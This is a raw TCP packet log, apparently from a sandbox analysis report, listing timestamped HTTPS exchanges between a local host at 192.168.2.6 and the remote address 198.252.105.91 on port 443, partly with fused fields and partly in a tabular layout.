                                                                                                              Nov 12, 2024 15:55:02.537777901 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.539791107 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.539799929 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.539833069 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.539866924 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.539876938 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.539901972 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.539923906 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.652843952 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.652869940 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.653150082 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.653182030 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.653251886 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.654488087 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.654504061 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.654561996 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.654572010 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.654608965 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.655386925 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.655401945 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.655448914 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.655457973 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.655493021 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.657282114 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.657294989 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.657349110 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.657356977 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.657392025 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.769119978 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769149065 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769198895 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.769222975 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769264936 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.769695997 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769711018 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769777060 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.769785881 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.769821882 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.770706892 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.770721912 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.770791054 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.770797968 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.770840883 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.773972988 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.773987055 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.774045944 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.774051905 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.774089098 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.774260044 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.774274111 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.774327993 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.774334908 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.774385929 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.775043011 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.775058031 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.775121927 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.775130033 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.775166035 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.775882006 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.775897980 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.775958061 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.775964975 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.776001930 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.884349108 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.884367943 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.884432077 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.884459972 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.884502888 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.884896994 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.884911060 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.884962082 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.884968996 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885005951 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.885359049 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885373116 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885435104 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.885442972 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885487080 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.885699034 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885714054 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885767937 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.885775089 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.885817051 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.885817051 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.886722088 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.886737108 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.886790991 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.886797905 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.886836052 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.886919975 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.886934042 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.886976957 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.886984110 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887023926 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.887347937 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887362957 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887420893 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.887428045 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887471914 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.887839079 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887855053 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887898922 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.887906075 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.887943029 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.888329029 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888345957 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888411045 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.888417959 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888451099 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.888716936 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888731956 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888782024 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.888788939 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.888835907 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.889359951 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.889379978 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.889413118 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.889419079 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.889442921 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.889467001 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890003920 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890018940 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890079021 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890086889 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890131950 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890260935 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890286922 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890317917 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890325069 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890347958 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890381098 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890902996 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890923023 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890953064 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.890959024 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.890991926 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.891001940 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.000685930 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.000706911 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.000792027 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.000808001 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.000854015 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.000971079 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.124313116 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.124326944 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.124363899 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.124371052 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.124403000 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.124771118 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.124784946 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.124818087 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.124824047 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.124854088 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.124861956 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.124973059 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.124986887 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.125025988 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.125034094 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.125063896 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.125226021 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.125241041 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.125274897 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.125282049 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.125319004 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.242041111 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242073059 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242145061 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.242175102 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242198944 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.242216110 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.242443085 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242460012 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242507935 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.242516994 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242549896 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.242598057 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242614031 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242643118 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.242650032 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242674112 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.242690086 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.242762089 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242775917 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242819071 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.242825985 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.242861032 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.243293047 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243308067 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243354082 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.243361950 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243396997 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.243433952 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243449926 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243493080 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.243504047 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243536949 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.243561983 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243576050 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243618011 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.243624926 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243635893 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243655920 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.243657112 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243669987 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.243681908 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.243727922 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.244299889 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.244313955 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.244370937 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.244378090 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.244411945 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.244453907 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.244468927 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.244503021 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.244510889 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.244537115 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.244596004 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.244610071 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.244646072 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.244652987 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.244684935 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.245246887 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245261908 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245305061 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.245311975 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245325089 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245343924 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.245346069 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245357037 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245369911 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.245397091 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.245502949 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245517969 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245543003 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.245548964 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245570898 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.245584011 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.245589972 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245604038 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245632887 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.245640039 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.245666981 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.245678902 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.246288061 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246306896 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246351957 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.246359110 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246370077 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246388912 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246390104 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.246401072 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246416092 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.246448994 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.246593952 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246608019 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246650934 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.246658087 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246694088 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.246934891 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246951103 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.246994972 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.247004032 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247035980 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.247229099 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247247934 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247284889 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.247291088 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247302055 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247304916 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.247318983 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.247324944 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247344971 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247347116 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.247369051 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.247374058 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247396946 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.247419119 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.247481108 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247494936 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247544050 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.247550011 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.247585058 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.248106956 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.248121023 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.248166084 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.248172045 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.248204947 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.248270035 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.248284101 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.248320103 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.248327017 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.248337984 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.248347998 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.248362064 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.248364925 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.248374939 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.248389959 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.248429060 CET49710443192.168.2.6198.252.105.91
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 12, 2024 15:55:03.347307920 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.347333908 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.347404957 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.347424030 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.347466946 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.348959923 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.348973989 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.349036932 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.349045992 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.349081993 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.349284887 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.349301100 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.349375963 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.349384069 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.349420071 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.349730968 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.349745989 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.349793911 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.349801064 CET  443          49710      198.252.105.91  192.168.2.6
Nov 12, 2024 15:55:03.349836111 CET  49710        443        192.168.2.6     198.252.105.91
Nov 12, 2024 15:55:03.350729942 CET  443          49710      198.252.105.91  192.168.2.6
